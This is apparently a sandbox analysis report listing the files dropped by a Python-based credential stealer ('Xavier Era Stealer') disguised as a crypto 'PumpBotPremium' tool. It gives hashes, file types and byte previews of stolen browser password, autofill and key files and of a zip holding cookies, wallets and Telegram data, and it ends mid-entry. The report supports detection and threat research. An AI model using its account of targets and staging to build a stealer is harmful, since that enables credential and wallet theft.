SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_pass.db

Download File

Process:	C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_Local State

Download File

Process:	C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	6648
Entropy (8bit):	5.799886528185702
Encrypted:	false
SSDEEP:	96:iaYufr62qpTM5ih/cI9URXl8RotowZFVvluhte4dUONIeTC6XQS0qGqk+Z4uj+rW:Io+The2RUUhH6qRAq1k8SPxVLZ7VTi1
MD5:	90A2F19EEFA47D85E430FE6C5168119E
SHA1:	37891580B150A8ACE11FFD627FBB31A27F23613D
SHA-256:	EB2BD55079C7F57F370274A590904D6816B2888B19EAD691FC316E2E34E6097B
SHA-512:	CA73C269544837779C04CD438FE07171FAF8FC88689D9AD9F3CBAEC3CC92A803F17FE9BB0CEEFC950B10930F079D9ABBB259BE32C8A6BBE7CEE331C2DCCE7E0A
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADscBs/HS2TTJocp6NtpoyLEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAsW8ultSdDwTk/AwAAbf7bEI2/b0XfFbP3jjJ+raY3fcAAAAADoAAAAACAAAgAAAAsg3hXdbXl6JIj8KFvhbWlaqVSpM3ag+0g0nExYB2Z1kwAAAAXs7yCB0jG0dlOoc3vEVs9i7od11B2WMH/KUhpHcou9G

C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_afills.db

Download File

Process:	C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_pass.db

Download File

Process:	C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Xavier\Chrome_Default_PASS.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe
File Type:	Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	855
Entropy (8bit):	3.2988852447158834
Encrypted:	false
SSDEEP:	24:7TTdHjRbbX1H1+1X1H1fP8rza10U91RLq:7FV1H1+1X1H1f910e1Vq
MD5:	E65C51E72CFDAD51E45243C057DFF807
SHA1:	BB800FC1BAA370F50D91225471D549BEA41467CB
SHA-256:	1E24C42F99D4CD29BA701396AAE8DCB78E92BCA13B1484A488B2A45508383ECE
SHA-512:	63508D8213B8B52EF39E5A2BB81D1DD55733C112DADFD11560EC8CDB745E07414A07B4E00AE76FB96272C07CF7BEF64DF7B54EF2D9F870F77740C6D19F3BC21E
Malicious:	false
Preview:	.... ... ... ...... ... ..................... .. ................... ........................ ...... ........... ............ .......... ...... ............ ............. .......... .... ...... ... ....... .............. ..... ... ...... ... ..... .............. ....... XAVIER ERA STEALER \| V2.71....==============================....

C:\Users\user\AppData\Local\Temp\Xavier\Edge_Default_PASS.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe
File Type:	Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	855
Entropy (8bit):	3.2988852447158834
Encrypted:	false
SSDEEP:	24:7TTdHjRbbX1H1+1X1H1fP8rza10U91RLq:7FV1H1+1X1H1f910e1Vq
MD5:	E65C51E72CFDAD51E45243C057DFF807
SHA1:	BB800FC1BAA370F50D91225471D549BEA41467CB
SHA-256:	1E24C42F99D4CD29BA701396AAE8DCB78E92BCA13B1484A488B2A45508383ECE
SHA-512:	63508D8213B8B52EF39E5A2BB81D1DD55733C112DADFD11560EC8CDB745E07414A07B4E00AE76FB96272C07CF7BEF64DF7B54EF2D9F870F77740C6D19F3BC21E
Malicious:	false
Preview:	.... ... ... ...... ... ..................... .. ................... ........................ ...... ........... ............ .......... ...... ............ ............. .......... .... ...... ... ....... .............. ..... ... ...... ... ..... .............. ....... XAVIER ERA STEALER \| V2.71....==============================....

C:\Users\user\AppData\Local\Temp\Xavier\Infos\Running_Softwares.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe
File Type:	Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	17961
Entropy (8bit):	5.660657011671521
Encrypted:	false
SSDEEP:	96:7FnV0lVf/hVzOUiUoUPUUvXW3lUgqCXweUBBMUyU5595v:7FaPSUiUoUPU9UxBeUHMUyU5bN
MD5:	70750391211A35EBE549F80332477893
SHA1:	DFB694BA27BBDC6EB333FE27FF91704BEC406BF8
SHA-256:	600A3B63A62E8E70EC3920A53C7604284FBB786BEBB718A9FC003D4AF2F88AA9
SHA-512:	989A46DD2430650AA77E557051312D84220159CD638FAB6D04908B45B377479B5AF2FC76A6D98BFA279421CC8B387E3DEE20318EF428D7AA1362B860AED73A86
Malicious:	false
Preview:	.... ... ... ...... ... ..................... .. ................... ........................ ...... ........... ............ .......... ...... ............ ............. .......... .... ...... ... ....... .............. ..... ... ...... ... ..... .............. ....... XAVIER ERA STEALER \| V2.71....====================================================....System Idle Process \| None..System \| ..Registry \| Registry..smss.exe \| C:\Windows\System32\smss.exe..WmiPrv

C:\Users\user\AppData\Local\Temp\Xavier\Screenshot.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	339129
Entropy (8bit):	7.988159341942521
Encrypted:	false
SSDEEP:	6144:wbDOSrqXDGxsA9Ta9LfVMgdWoHcaHUTJl02GAbZoGE7v+CvDbNUwFyWG3:wuSrSA9TOf6Zo8iUn02GA94r+CvpFyWS
MD5:	A5FBFDD9AAA93CBA32468996F7D566BB
SHA1:	49E32F3035D8897F7A4A6AE550681DC563D2D265
SHA-256:	C509FBD883411B02563FDD7C2C6EDCFD2C599A05CBA914B99F1F18A4A8E41E25
SHA-512:	05D60DCD564286FD2EAAED6C7AB793ECF7A9C37312D0A3738D743FE7FF8962F796D4457FDC3550B15DC298B7776185E32051DD59D8EDC2949328A57B4C35E3AC
Malicious:	false
Preview:	.PNG........IHDR.............1.c.....IDATx..{.]Eu7.]..9O.'..$.B.....VQA."A.-..K[%.}.%.J/j....h.Z....U.R..&..%j.....D!.h .'!..g..X{.Y{...9.-.."..s..=.f...w.5..../\......D...R,].K...?&iR.e..b..b..........J...B".v..5U}.?.P\|....fSw.C.\.U.NI.]..l.0.92C....U5..<.....q.A=..l.0.a.[....4.\?..c?.[z.9TX\|Gw..YS.^.s....9...U.C..?..g>w>k=2..........KJ..i.w.v.^a.KJ.P.%"......d..Lz....F...^x.E&...lx..8....Z.{..I.9'..g"B.\|.@.cC.P..""i.v?!bf....n...1s...{.\.V...\..@QgU.I.0s.^g.v..\.!.9....@>..T[.....>I...mKzGD..WT..uqt..T.tO.(H...`..^afm]..@d(B.!...pK.R...^x.UW....D8.v[..{.n6)I.si..j5..."...s...x.L...v}....e.wNF..j.v...\|-i+..]V..U..j.Z..0.rSaRAU.C..v..h.j.......~....q.E&.._. .J.4MSa.NR.p..L"U'.P..N.T.[..i.{...y....,..W4k..'..%.I(.P.\..k...N:+=.'..,7...9....S....C._.G..M..w]:..?..<... .\....".Y.aRe....R.....9"b...#.UZ..c...G.if.&-<. C...`W.mN.J.h7K.g) .l..VPd.z...........N.\|V..@M..=.K+.. ......C.H.8XI.0..g.mWo.<.(B...3T.5(..#+XQ..6... \...Zm.X..RJ.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0qrgu5vq.u1l.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_en4screy.gl3.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ivhwg00s.d1k.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l0mofyuw.m1b.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pkigec2k.hel.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s1qambow.qiw.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_taia5r2k.wpj.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tzpwwpp3.yb1.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vtuhxin0.xow.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zbuebbkh.ghe.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\user_95030.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	339785
Entropy (8bit):	7.995596798893531
Encrypted:	true
SSDEEP:	6144:1jD4SrSXDGJsA9EvBaPylyWD5k1lzRVU/fvmqUkmJTWpGK/bZoGENv+ClJRKRNnX:1ASraA9EvEqlnDO1lzRVU/fvmqLqqF/Z
MD5:	7BAB0849971CB5C4A9F3B9DDA1C1B65C
SHA1:	8F1CB148AA1BE787DC7AA52D9A19BC499C2E0567
SHA-256:	3CFBD54F4E882D9B7A6FE6C736B271D7D1EA71239DD5A48E3A3D7A8AB56C2C06
SHA-512:	A02292A8070E7301970ABF08869844B7F70D6DC4617C6AA6AD363BC7CBAAF00F38DDB1C6CF158B27D284DAA8F8998E9F34CB783281B609F3232226BA5EBA3AEA
Malicious:	false
Preview:	PK..........^Y................Autofills/PK..........^Y................Cookies/PK..........^Y................Files/PK..........^Y................Infos/PK..........^Y................Telegram/PK..........^Y................Wallets/PK..........^Y.e!....W.......Chrome_Default_PASS.txt....R..G.:@h.td&..G.!.:...........Sga.6...H.. ..f".+&b0`....i.w 9....@.........$.....1B.......Y.\....a....c..d..8...Z.z0...Y.i..X.....9.....)..9.H..."..<]..\....C\.}....0#=sC.R[.....PK..........^Y.e!....W.......Edge_Default_PASS.txt....R..G.:@h.td&..G.!.:...........Sga.6...H.. ..f".+&b0`....i.w 9....@.........$.....1B.......Y.\....a....c..d..8...Z.z0...Y.i..X.....9.....)..9.H..."..<]..\....C\.}....0#=sC.R[.....PK..........^Y..#.."...,......Screenshot.png.J@...PNG........IHDR.............1.c.....IDATx..{.]Eu7.]..9O.'..$.B.....VQA."A.-..K[%.}.%.J/j....h.Z....U.R..&..%j.....D!.h .'!..g..X{.Y{...9.-.."..s..=.f...w.5..../\......D...R,].K...?&iR.e..b..b..........J...B".v..5U}.?.P\|....fSw.C

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	41556480
Entropy (8bit):	6.224867531040842
Encrypted:	false
SSDEEP:	196608:bV94ZlVzjMD1qzKKIqyS40V9WLsv7kQWrr4aczVn1cHyiD:ZKvVUAzKc9WLsv78rbczV1cHy
MD5:	E2FCA92943AC7464998DB6DEC39BDDD7
SHA1:	16FF4951B888A7420B3CD55EB0F2FB97633BA76C
SHA-256:	196944F02ABCB5DE9D85A15373CB0B1019E954C2A91C959D5710805994ECC34F
SHA-512:	D4D1AFBAD54B01D7F4AE13CF4DA09CC0292A6F5202ECE41366D6F90B95725BB30D56B5188E2A09BFA1A50DB8D0037AEA01A723711C4A6887BCC038544036C475
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...6..e...............)......z.....%..........@.............................0......"H....`.................................................. ..H<........................... ..X...............................(...................8-...............................text...............................`..`.data... ...........................@....rdata...............t..............@..@.eh_fram.............\..............@....pdata...............^..............@..@.xdata.......P......................@..@.bss.........p...........................idata..H<... ...>...,..............@....CRT....`....`.......j..............@....tls.........p.......l..............@....rsrc................n..............@..@.reloc..X.... ........z.............@..B................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_Salsa20.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13824
Entropy (8bit):	5.043023051517476
Encrypted:	false
SSDEEP:	192:SF/1nb2eqCQtkluknuz4ceS4QDuBA7cqgYvEP:o2P6luLtn4QDKmgYvEP
MD5:	E598D24941E68620AEF43723B239E1C5
SHA1:	FA3C711AA55A700E2D5421F5F73A50662A9CC443
SHA-256:	E63D4123D894B61E0242D53813307FA1FF3B7B60818827520F7FF20CABCD8904
SHA-512:	904E04FB28CFFA2890C0CB4F1169A7CC830224740F0DF3DA622AC2EB9B8F8BDBB4DE88836E40A0126BE0EB3E5131A8D8B5AAACD782D1C5875A2FBBC939F78D5B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: msupdate.exe, Detection: malicious, Browse Filename: msupdate.exe, Detection: malicious, Browse Filename: win6.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win64.DropperX-gen.9519.23032.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win64.DropperX-gen.9519.23032.exe, Detection: malicious, Browse Filename: Wetransfer.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.FileRepMalware.10144.24483.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W64.S-e4cd4610.Eldorado.25276.12705.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Python.Agent-LZ.32136.12177.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Python.Agent-LZ.23397.22787.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.EY.p+..p+..p+......p+.A...p+.E...p+..p*.+p+.A....p+.A./..p+.A.(..p+...#..p+...+..p+......p+...)..p+.Rich.p+.........PE..d....Ded.........." ..."............P.....................................................`..........................................8.......9..d....`.......P..L............p..,....3...............................1..@............0...............................text...h........................... ..`.rdata.......0......................@..@.data...8....@.......,..............@....pdata..L....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_aes.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	6.5538426720189396
Encrypted:	false
SSDEEP:	384:3f+7nYpPMedFDlDchrVX1mEVmT9ZgkoD/PKDkGuF0U390QOo8VdbKBWmuvLg4HPy:PqWB7YJlmLJ3oD/S4j990th9VvsC
MD5:	ABBE9B2424566E107CB05D0DDA0AA636
SHA1:	C75E54FEB76CF8BEB7B6818840B11CE649FBCAA8
SHA-256:	C438DD66FA669430CCE11B2ACB7DC0EE72B7953B07013FDA6BF6B803C2C961F9
SHA-512:	743C48D380BF5F03ECED639D35A5500CACD170942450415C3E822BFE368D90F75339CC64AC58766858FC7250618DEE699705AAC12B3C3657951528CDD32C8C1C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: msupdate.exe, Detection: malicious, Browse Filename: msupdate.exe, Detection: malicious, Browse Filename: win6.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win64.DropperX-gen.9519.23032.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win64.DropperX-gen.9519.23032.exe, Detection: malicious, Browse Filename: Wetransfer.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.FileRepMalware.10144.24483.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W64.S-e4cd4610.Eldorado.25276.12705.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Python.Agent-LZ.32136.12177.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Python.Agent-LZ.23397.22787.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.&...H...H...H.......H.I.I...H.M.I...H...I.#.H.I.M...H.I.L...H.I.K...H..@...H..H...H......H..J...H.Rich..H.................PE..d....Ded.........." ...".H...H......P.....................................................`.................................................,...d...............................4... ...................................@............`...............................text....F.......H.................. ..`.rdata..d6...`...8...L..............@..@.data...8...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_aesni.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	5.285321423775064
Encrypted:	false
